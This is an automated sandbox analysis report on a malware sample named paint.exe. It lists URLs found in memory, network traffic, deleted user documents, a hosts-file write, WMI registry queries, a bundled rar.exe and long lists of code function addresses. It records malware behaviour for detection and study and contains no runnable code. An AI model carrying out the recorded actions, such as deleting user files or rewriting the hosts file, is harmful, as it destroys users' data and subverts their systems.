Source: paint.exe, 00000001.00000003.1719996655.0000020771A4C000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1735925915.0000020771AC1000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1785051824.0000020771906000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1724786299.0000020771AC1000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1920856863.0000020771906000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1729735944.0000020771AC1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/
Source: paint.exe, 00000001.00000003.1913464160.0000020771AE5000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1729735944.0000020771AE5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
Source: paint.exe, 00000001.00000003.1719996655.0000020771A4C000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1735925915.0000020771AC1000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1726814607.0000020771A2A000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1726814607.0000020771A14000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1724786299.0000020771AC1000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1729735944.0000020771AC1000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1712589930.0000020771A14000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/
Source: paint.exe, 00000001.00000003.1913464160.0000020771AE5000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1729735944.0000020771AE5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
Source: paint.exe, 00000001.00000003.1719996655.0000020771A4C000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1735925915.0000020771AC1000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1724786299.0000020771AC1000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1729735944.0000020771AC1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
Source: paint.exe, 00000001.00000003.1913464160.0000020771AE5000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1729735944.0000020771AE5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: paint.exe, 00000001.00000003.1913464160.0000020771AE5000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1719996655.0000020771A4C000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1735925915.0000020771AC1000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1729735944.0000020771AE5000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1724786299.0000020771AC1000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1729735944.0000020771AC1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: paint.exe, 00000001.00000003.1785051824.0000020771906000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000002.2008958155.0000020771906000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1920856863.0000020771906000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.2006772338.0000020771906000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/media/img/favicons/mozilla/favicon-196x196.2af054fea211.png
Source: paint.exe, 00000001.00000003.2006772338.000002077185F000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1724786299.0000020771A3D000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1712589930.0000020771A34000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000002.2008879287.0000020771790000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1785051824.000002077185F000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1729735944.0000020771A34000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1726814607.0000020771A34000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1920856863.0000020771864000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000002.2008958155.00000207718A3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/media/img/favicons/mozilla/favicon.d25d81d39065.icox
Source: paint.exe, 00000001.00000003.1913464160.0000020771AE5000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1729735944.0000020771AE5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: paint.exe, 00000001.00000003.1914665932.0000020772072000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000002.2012300197.0000020772CC4000.00000004.00001000.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1913464160.0000020771AD2000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1781575579.0000020771AD4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com
Source: paint.exe, 00000001.00000002.2012300197.0000020772C20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.olx.pl/
Source: paint.exe, 00000000.00000003.1671896569.0000023393142000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000002.2014972970.00007FFDFB02A000.00000004.00000001.01000000.00000010.sdmp, paint.exe, 00000001.00000002.2016893620.00007FFE00829000.00000004.00000001.01000000.00000011.sdmp, libcrypto-3.dll.0.dr	String found in binary or memory: https://www.openssl.org/H
Source: paint.exe, paint.exe, 00000001.00000002.2015768208.00007FFDFB6D4000.00000040.00000001.01000000.00000005.sdmp	String found in binary or memory: https://www.python.org/psf/license/
Source: paint.exe, 00000001.00000002.2015768208.00007FFDFB5D0000.00000040.00000001.01000000.00000005.sdmp	String found in binary or memory: https://www.python.org/psf/license/)
Source: paint.exe, 00000001.00000002.2012300197.0000020772C20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.reddit.com/
Source: paint.exe, 00000001.00000002.2009946233.0000020771B9C000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1782235643.0000020771B9E000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1711530938.0000020771B91000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.2004727333.0000020771B91000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1711380871.00000207714F1000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1725063677.0000020771BA0000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1734071594.0000020771B9E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.rfc-editor.org/rfc/rfc8259#section-8.1
Source: paint.exe, 00000001.00000002.2011815556.000002077262C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.wykop.pl/
Source: paint.exe, 00000001.00000002.2012300197.0000020772C20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/
Source: paint.exe, 00000001.00000003.1785051824.0000020771906000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000002.2008958155.0000020771906000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1920856863.0000020771906000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000002.2008427127.0000020771390000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.2006772338.0000020771906000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://yahoo.com/

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Window created: window name: CLIPBRDWNDCLASS

Spam, unwanted Advertisements and Ransom Demands

Modifies existing user documents (likely ransomware behavior)

Source: C:\Users\user\Desktop\paint.exe	File deleted: C:\Users\user\AppData\Local\Temp\?? ? ?? \Common Files\Desktop\DTBZGIOOSO.docx	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	File deleted: C:\Users\user\AppData\Local\Temp\?? ? ?? \Common Files\Desktop\DTBZGIOOSO.docx	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	File deleted: C:\Users\user\AppData\Local\Temp\?? ? ?? \Common Files\Desktop\VLZDGUKUTZ.jpg	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	File deleted: C:\Users\user\AppData\Local\Temp\?? ? ?? \Common Files\Desktop\VLZDGUKUTZ.xlsx	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	File deleted: C:\Users\user\AppData\Local\Temp\?? ? ?? \Common Files\Desktop\ONBQCLYSPU.pdf	Jump to behavior

Modifies the hosts file

Source: C:\Users\user\Desktop\paint.exe

File written: C:\Windows\System32\drivers\etc\hosts

Jump to behavior

Source: cmd.exe

Process created: 66

System Summary

Writes or reads registry keys via WMI

Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\cmd.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue

Source: C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exe

Code function: 88_2_00007FF623DED2C0: CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,

88_2_00007FF623DED2C0

Source: C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exe

Code function: 88_2_00007FF623E1B57C GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitWindowsEx,

88_2_00007FF623E1B57C

Source: C:\Users\user\Desktop\paint.exe	Code function: 0_2_00007FF6F0BF69D4	0_2_00007FF6F0BF69D4
Source: C:\Users\user\Desktop\paint.exe	Code function: 0_2_00007FF6F0BF0938	0_2_00007FF6F0BF0938
Source: C:\Users\user\Desktop\paint.exe	Code function: 0_2_00007FF6F0BD8BD0	0_2_00007FF6F0BD8BD0
Source: C:\Users\user\Desktop\paint.exe	Code function: 0_2_00007FF6F0BD1000	0_2_00007FF6F0BD1000
Source: C:\Users\user\Desktop\paint.exe	Code function: 0_2_00007FF6F0BE3A14	0_2_00007FF6F0BE3A14
Source: C:\Users\user\Desktop\paint.exe	Code function: 0_2_00007FF6F0BE21D4	0_2_00007FF6F0BE21D4
Source: C:\Users\user\Desktop\paint.exe	Code function: 0_2_00007FF6F0BE19B4	0_2_00007FF6F0BE19B4
Source: C:\Users\user\Desktop\paint.exe	Code function: 0_2_00007FF6F0BE8154	0_2_00007FF6F0BE8154
Source: C:\Users\user\Desktop\paint.exe	Code function: 0_2_00007FF6F0BEDACC	0_2_00007FF6F0BEDACC
Source: C:\Users\user\Desktop\paint.exe	Code function: 0_2_00007FF6F0BE1BC0	0_2_00007FF6F0BE1BC0
Source: C:\Users\user\Desktop\paint.exe	Code function: 0_2_00007FF6F0BDA34B	0_2_00007FF6F0BDA34B
Source: C:\Users\user\Desktop\paint.exe	Code function: 0_2_00007FF6F0BDAD1D	0_2_00007FF6F0BDAD1D
Source: C:\Users\user\Desktop\paint.exe	Code function: 0_2_00007FF6F0BDA4E4	0_2_00007FF6F0BDA4E4
Source: C:\Users\user\Desktop\paint.exe	Code function: 0_2_00007FF6F0BF3C80	0_2_00007FF6F0BF3C80
Source: C:\Users\user\Desktop\paint.exe	Code function: 0_2_00007FF6F0BE2C80	0_2_00007FF6F0BE2C80
Source: C:\Users\user\Desktop\paint.exe	Code function: 0_2_00007FF6F0BF0938	0_2_00007FF6F0BF0938
Source: C:\Users\user\Desktop\paint.exe	Code function: 0_2_00007FF6F0BF6488	0_2_00007FF6F0BF6488
Source: C:\Users\user\Desktop\paint.exe	Code function: 0_2_00007FF6F0BF5C70	0_2_00007FF6F0BF5C70
Source: C:\Users\user\Desktop\paint.exe	Code function: 0_2_00007FF6F0BE3610	0_2_00007FF6F0BE3610
Source: C:\Users\user\Desktop\paint.exe	Code function: 0_2_00007FF6F0BE1DC4	0_2_00007FF6F0BE1DC4
Source: C:\Users\user\Desktop\paint.exe	Code function: 0_2_00007FF6F0BEE5E0	0_2_00007FF6F0BEE5E0
Source: C:\Users\user\Desktop\paint.exe	Code function: 0_2_00007FF6F0BE5DA0	0_2_00007FF6F0BE5DA0
Source: C:\Users\user\Desktop\paint.exe	Code function: 0_2_00007FF6F0BE9F10	0_2_00007FF6F0BE9F10
Source: C:\Users\user\Desktop\paint.exe	Code function: 0_2_00007FF6F0BF5EEC	0_2_00007FF6F0BF5EEC
Source: C:\Users\user\Desktop\paint.exe	Code function: 0_2_00007FF6F0BE8804	0_2_00007FF6F0BE8804
Source: C:\Users\user\Desktop\paint.exe	Code function: 0_2_00007FF6F0BE1FD0	0_2_00007FF6F0BE1FD0
Source: C:\Users\user\Desktop\paint.exe	Code function: 0_2_00007FF6F0BF9798	0_2_00007FF6F0BF9798
Source: C:\Users\user\Desktop\paint.exe	Code function: 0_2_00007FF6F0BE17B0	0_2_00007FF6F0BE17B0
Source: C:\Users\user\Desktop\paint.exe	Code function: 0_2_00007FF6F0BEDF60	0_2_00007FF6F0BEDF60
Source: C:\Users\user\Desktop\paint.exe	Code function: 0_2_00007FF6F0BF411C	0_2_00007FF6F0BF411C
Source: C:\Users\user\Desktop\paint.exe	Code function: 0_2_00007FF6F0BF18E4	0_2_00007FF6F0BF18E4
Source: C:\Users\user\Desktop\paint.exe	Code function: 0_2_00007FF6F0BD9870	0_2_00007FF6F0BD9870
Source: C:\Users\user\Desktop\paint.exe	Code function: 1_2_00007FF6F0BF69D4	1_2_00007FF6F0BF69D4
Source: C:\Users\user\Desktop\paint.exe	Code function: 1_2_00007FF6F0BF5C70	1_2_00007FF6F0BF5C70
Source: C:\Users\user\Desktop\paint.exe	Code function: 1_2_00007FF6F0BD1000	1_2_00007FF6F0BD1000
Source: C:\Users\user\Desktop\paint.exe	Code function: 1_2_00007FF6F0BE3A14	1_2_00007FF6F0BE3A14
Source: C:\Users\user\Desktop\paint.exe	Code function: 1_2_00007FF6F0BE21D4	1_2_00007FF6F0BE21D4
Source: C:\Users\user\Desktop\paint.exe	Code function: 1_2_00007FF6F0BE19B4	1_2_00007FF6F0BE19B4
Source: C:\Users\user\Desktop\paint.exe	Code function: 1_2_00007FF6F0BF0938	1_2_00007FF6F0BF0938
Source: C:\Users\user\Desktop\paint.exe	Code function: 1_2_00007FF6F0BE8154	1_2_00007FF6F0BE8154
Source: C:\Users\user\Desktop\paint.exe	Code function: 1_2_00007FF6F0BEDACC	1_2_00007FF6F0BEDACC
Source: C:\Users\user\Desktop\paint.exe	Code function: 1_2_00007FF6F0BE1BC0	1_2_00007FF6F0BE1BC0
Source: C:\Users\user\Desktop\paint.exe	Code function: 1_2_00007FF6F0BD8BD0	1_2_00007FF6F0BD8BD0
Source: C:\Users\user\Desktop\paint.exe	Code function: 1_2_00007FF6F0BDA34B	1_2_00007FF6F0BDA34B
Source: C:\Users\user\Desktop\paint.exe	Code function: 1_2_00007FF6F0BDAD1D	1_2_00007FF6F0BDAD1D
Source: C:\Users\user\Desktop\paint.exe	Code function: 1_2_00007FF6F0BDA4E4	1_2_00007FF6F0BDA4E4
Source: C:\Users\user\Desktop\paint.exe	Code function: 1_2_00007FF6F0BF3C80	1_2_00007FF6F0BF3C80
Source: C:\Users\user\Desktop\paint.exe	Code function: 1_2_00007FF6F0BE2C80	1_2_00007FF6F0BE2C80
Source: C:\Users\user\Desktop\paint.exe	Code function: 1_2_00007FF6F0BF0938	1_2_00007FF6F0BF0938
Source: C:\Users\user\Desktop\paint.exe	Code function: 1_2_00007FF6F0BF6488	1_2_00007FF6F0BF6488
Source: C:\Users\user\Desktop\paint.exe	Code function: 1_2_00007FF6F0BE3610	1_2_00007FF6F0BE3610
Source: C:\Users\user\Desktop\paint.exe	Code function: 1_2_00007FF6F0BE1DC4	1_2_00007FF6F0BE1DC4
Source: C:\Users\user\Desktop\paint.exe	Code function: 1_2_00007FF6F0BEE5E0	1_2_00007FF6F0BEE5E0
Source: C:\Users\user\Desktop\paint.exe	Code function: 1_2_00007FF6F0BE5DA0	1_2_00007FF6F0BE5DA0
Source: C:\Users\user\Desktop\paint.exe	Code function: 1_2_00007FF6F0BE9F10	1_2_00007FF6F0BE9F10
Source: C:\Users\user\Desktop\paint.exe	Code function: 1_2_00007FF6F0BF5EEC	1_2_00007FF6F0BF5EEC
Source: C:\Users\user\Desktop\paint.exe	Code function: 1_2_00007FF6F0BE8804	1_2_00007FF6F0BE8804
Source: C:\Users\user\Desktop\paint.exe	Code function: 1_2_00007FF6F0BE1FD0	1_2_00007FF6F0BE1FD0
Source: C:\Users\user\Desktop\paint.exe	Code function: 1_2_00007FF6F0BF9798	1_2_00007FF6F0BF9798
Source: C:\Users\user\Desktop\paint.exe	Code function: 1_2_00007FF6F0BE17B0	1_2_00007FF6F0BE17B0
Source: C:\Users\user\Desktop\paint.exe	Code function: 1_2_00007FF6F0BEDF60	1_2_00007FF6F0BEDF60
Source: C:\Users\user\Desktop\paint.exe	Code function: 1_2_00007FF6F0BF411C	1_2_00007FF6F0BF411C
Source: C:\Users\user\Desktop\paint.exe	Code function: 1_2_00007FF6F0BF18E4	1_2_00007FF6F0BF18E4
Source: C:\Users\user\Desktop\paint.exe	Code function: 1_2_00007FF6F0BD9870	1_2_00007FF6F0BD9870
Source: C:\Users\user\Desktop\paint.exe	Code function: 1_2_00007FFDFAA012F0	1_2_00007FFDFAA012F0
Source: C:\Users\user\Desktop\paint.exe	Code function: 1_2_00007FFDFAA01880	1_2_00007FFDFAA01880
Source: C:\Users\user\Desktop\paint.exe	Code function: 1_2_00007FFDFB029060	1_2_00007FFDFB029060
Source: C:\Users\user\Desktop\paint.exe	Code function: 1_2_00007FFDFB0DCFB0	1_2_00007FFDFB0DCFB0
Source: C:\Users\user\Desktop\paint.exe	Code function: 1_2_00007FFDFB0E4CF0	1_2_00007FFDFB0E4CF0
Source: C:\Users\user\Desktop\paint.exe	Code function: 1_2_00007FFDFB079D10	1_2_00007FFDFB079D10
Source: C:\Users\user\Desktop\paint.exe	Code function: 1_2_00007FFDFB0792C0	1_2_00007FFDFB0792C0
Source: C:\Users\user\Desktop\paint.exe	Code function: 1_2_00007FFDFB0822E0	1_2_00007FFDFB0822E0
Source: C:\Users\user\Desktop\paint.exe	Code function: 1_2_00007FFDFB0CBB80	1_2_00007FFDFB0CBB80
Source: C:\Users\user\Desktop\paint.exe	Code function: 1_2_00007FFDFB0C4BB0	1_2_00007FFDFB0C4BB0
Source: C:\Users\user\Desktop\paint.exe	Code function: 1_2_00007FFDFB069BA0	1_2_00007FFDFB069BA0
Source: C:\Users\user\Desktop\paint.exe	Code function: 1_2_00007FFDFB0B6BD0	1_2_00007FFDFB0B6BD0
Source: C:\Users\user\Desktop\paint.exe	Code function: 1_2_00007FFDFB063C10	1_2_00007FFDFB063C10
Source: C:\Users\user\Desktop\paint.exe	Code function: 1_2_00007FFDFB07CC40	1_2_00007FFDFB07CC40
Source: C:\Users\user\Desktop\paint.exe	Code function: 1_2_00007FFDFB0C29E0	1_2_00007FFDFB0C29E0
Source: C:\Users\user\Desktop\paint.exe	Code function: 1_2_00007FFDFB089A30	1_2_00007FFDFB089A30
Source: C:\Users\user\Desktop\paint.exe	Code function: 1_2_00007FFDFB06FA20	1_2_00007FFDFB06FA20
Source: C:\Users\user\Desktop\paint.exe	Code function: 1_2_00007FFDFB0D2866	1_2_00007FFDFB0D2866
Source: C:\Users\user\Desktop\paint.exe	Code function: 1_2_00007FFDFB06287E	1_2_00007FFDFB06287E
Source: C:\Users\user\Desktop\paint.exe	Code function: 1_2_00007FFDFB06A8D0	1_2_00007FFDFB06A8D0
Source: C:\Users\user\Desktop\paint.exe	Code function: 1_2_00007FFDFB0CC8C0	1_2_00007FFDFB0CC8C0
Source: C:\Users\user\Desktop\paint.exe	Code function: 1_2_00007FFDFB0A5910	1_2_00007FFDFB0A5910
Source: C:\Users\user\Desktop\paint.exe	Code function: 1_2_00007FFDFB076940	1_2_00007FFDFB076940
Source: C:\Users\user\Desktop\paint.exe	Code function: 1_2_00007FFDFB115030	1_2_00007FFDFB115030
Source: C:\Users\user\Desktop\paint.exe	Code function: 1_2_00007FFDFB0EC040	1_2_00007FFDFB0EC040
Source: C:\Users\user\Desktop\paint.exe	Code function: 1_2_00007FFDFB0A4F00	1_2_00007FFDFB0A4F00
Source: C:\Users\user\Desktop\paint.exe	Code function: 1_2_00007FFDFB0FCF20	1_2_00007FFDFB0FCF20
Source: C:\Users\user\Desktop\paint.exe	Code function: 1_2_00007FFDFB070DD0	1_2_00007FFDFB070DD0
Source: C:\Users\user\Desktop\paint.exe	Code function: 1_2_00007FFDFB08DE40	1_2_00007FFDFB08DE40
Source: C:\Users\user\Desktop\paint.exe	Code function: 1_2_00007FFDFB112C60	1_2_00007FFDFB112C60
Source: C:\Users\user\Desktop\paint.exe	Code function: 1_2_00007FFDFB0BCCD0	1_2_00007FFDFB0BCCD0
Source: C:\Users\user\Desktop\paint.exe	Code function: 1_2_00007FFDFB09CCE9	1_2_00007FFDFB09CCE9
Source: C:\Users\user\Desktop\paint.exe	Code function: 1_2_00007FFDFB0F8D00	1_2_00007FFDFB0F8D00
Source: C:\Users\user\Desktop\paint.exe	Code function: 1_2_00007FFDFB0EAD20	1_2_00007FFDFB0EAD20
Source: C:\Users\user\Desktop\paint.exe	Code function: 1_2_00007FFDFB0BBD50	1_2_00007FFDFB0BBD50
Source: C:\Users\user\Desktop\paint.exe	Code function: 1_2_00007FFDFB06BD40	1_2_00007FFDFB06BD40
Source: C:\Users\user\Desktop\paint.exe	Code function: 1_2_00007FFDFB0AF360	1_2_00007FFDFB0AF360
Source: C:\Users\user\Desktop\paint.exe	Code function: 1_2_00007FFDFB07C380	1_2_00007FFDFB07C380
Source: C:\Users\user\Desktop\paint.exe	Code function: 1_2_00007FFDFB08F380	1_2_00007FFDFB08F380
Source: C:\Users\user\Desktop\paint.exe	Code function: 1_2_00007FFDFB0EA380	1_2_00007FFDFB0EA380
Source: C:\Users\user\Desktop\paint.exe	Code function: 1_2_00007FFDFB08D3A0	1_2_00007FFDFB08D3A0
Source: C:\Users\user\Desktop\paint.exe	Code function: 1_2_00007FFDFB0C73E0	1_2_00007FFDFB0C73E0
Source: C:\Users\user\Desktop\paint.exe	Code function: 1_2_00007FFDFB0D4430	1_2_00007FFDFB0D4430
Source: C:\Users\user\Desktop\paint.exe	Code function: 1_2_00007FFDFB07D2B0	1_2_00007FFDFB07D2B0
Source: C:\Users\user\Desktop\paint.exe	Code function: 1_2_00007FFDFB067336	1_2_00007FFDFB067336
Source: C:\Users\user\Desktop\paint.exe	Code function: 1_2_00007FFDFB124320	1_2_00007FFDFB124320
Source: C:\Users\user\Desktop\paint.exe	Code function: 1_2_00007FFDFB0631A5	1_2_00007FFDFB0631A5
Source: C:\Users\user\Desktop\paint.exe	Code function: 1_2_00007FFDFB0721F0	1_2_00007FFDFB0721F0
Source: C:\Users\user\Desktop\paint.exe	Code function: 1_2_00007FFDFB0880B0	1_2_00007FFDFB0880B0
Source: C:\Users\user\Desktop\paint.exe	Code function: 1_2_00007FFDFB0870D0	1_2_00007FFDFB0870D0
Source: C:\Users\user\Desktop\paint.exe	Code function: 1_2_00007FFDFB064120	1_2_00007FFDFB064120
Source: C:\Users\user\Desktop\paint.exe	Code function: 1_2_00007FFDFB0D77D0	1_2_00007FFDFB0D77D0
Source: C:\Users\user\Desktop\paint.exe	Code function: 1_2_00007FFDFB064820	1_2_00007FFDFB064820
Source: C:\Users\user\Desktop\paint.exe	Code function: 1_2_00007FFDFB073660	1_2_00007FFDFB073660
Source: C:\Users\user\Desktop\paint.exe	Code function: 1_2_00007FFDFB0BE700	1_2_00007FFDFB0BE700
Source: C:\Users\user\Desktop\paint.exe	Code function: 1_2_00007FFDFB0C0750	1_2_00007FFDFB0C0750
Source: C:\Users\user\Desktop\paint.exe	Code function: 1_2_00007FFDFB064570	1_2_00007FFDFB064570
Source: C:\Users\user\Desktop\paint.exe	Code function: 1_2_00007FFDFB0AA5A0	1_2_00007FFDFB0AA5A0
Source: C:\Users\user\Desktop\paint.exe	Code function: 1_2_00007FFDFB084630	1_2_00007FFDFB084630
Source: C:\Users\user\Desktop\paint.exe	Code function: 1_2_00007FFDFB091630	1_2_00007FFDFB091630
Source: C:\Users\user\Desktop\paint.exe	Code function: 1_2_00007FFDFB08E650	1_2_00007FFDFB08E650
Source: C:\Users\user\Desktop\paint.exe	Code function: 1_2_00007FFDFB0BB640	1_2_00007FFDFB0BB640
Source: C:\Users\user\Desktop\paint.exe	Code function: 1_2_00007FFDFB0694E0	1_2_00007FFDFB0694E0
Source: C:\Users\user\Desktop\paint.exe	Code function: 1_2_00007FFDFB105510	1_2_00007FFDFB105510
Source: C:\Users\user\Desktop\paint.exe	Code function: 1_2_00007FFDFB892230	1_2_00007FFDFB892230
Source: C:\Users\user\Desktop\paint.exe	Code function: 1_2_00007FFE007A5C00	1_2_00007FFE007A5C00
Source: C:\Users\user\Desktop\paint.exe	Code function: 1_2_00007FFE00761D93	1_2_00007FFE00761D93
Source: C:\Users\user\Desktop\paint.exe	Code function: 1_2_00007FFE007616FE	1_2_00007FFE007616FE
Source: C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exe	Code function: 88_2_00007FF623DE54C0	88_2_00007FF623DE54C0
Source: C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exe	Code function: 88_2_00007FF623DD82F0	88_2_00007FF623DD82F0
Source: C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exe	Code function: 88_2_00007FF623DE1180	88_2_00007FF623DE1180
Source: C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exe	Code function: 88_2_00007FF623DD1884	88_2_00007FF623DD1884
Source: C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exe	Code function: 88_2_00007FF623DDB540	88_2_00007FF623DDB540
Source: C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exe	Code function: 88_2_00007FF623DDABA0	88_2_00007FF623DDABA0
Source: C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exe	Code function: 88_2_00007FF623E07B24	88_2_00007FF623E07B24
Source: C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exe	Code function: 88_2_00007FF623DE0A2C	88_2_00007FF623DE0A2C
Source: C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exe	Code function: 88_2_00007FF623DFAE10	88_2_00007FF623DFAE10
Source: C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exe	Code function: 88_2_00007FF623DDA504	88_2_00007FF623DDA504
Source: C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exe	Code function: 88_2_00007FF623E15468	88_2_00007FF623E15468
Source: C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exe	Code function: 88_2_00007FF623DFD458	88_2_00007FF623DFD458
Source: C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exe	Code function: 88_2_00007FF623DFC3E0	88_2_00007FF623DFC3E0
Source: C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exe	Code function: 88_2_00007FF623DE2360	88_2_00007FF623DE2360
Source: C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exe	Code function: 88_2_00007FF623E00374	88_2_00007FF623E00374
Source: C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exe	Code function: 88_2_00007FF623E2832C	88_2_00007FF623E2832C
Source: C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exe	Code function: 88_2_00007FF623E21314	88_2_00007FF623E21314
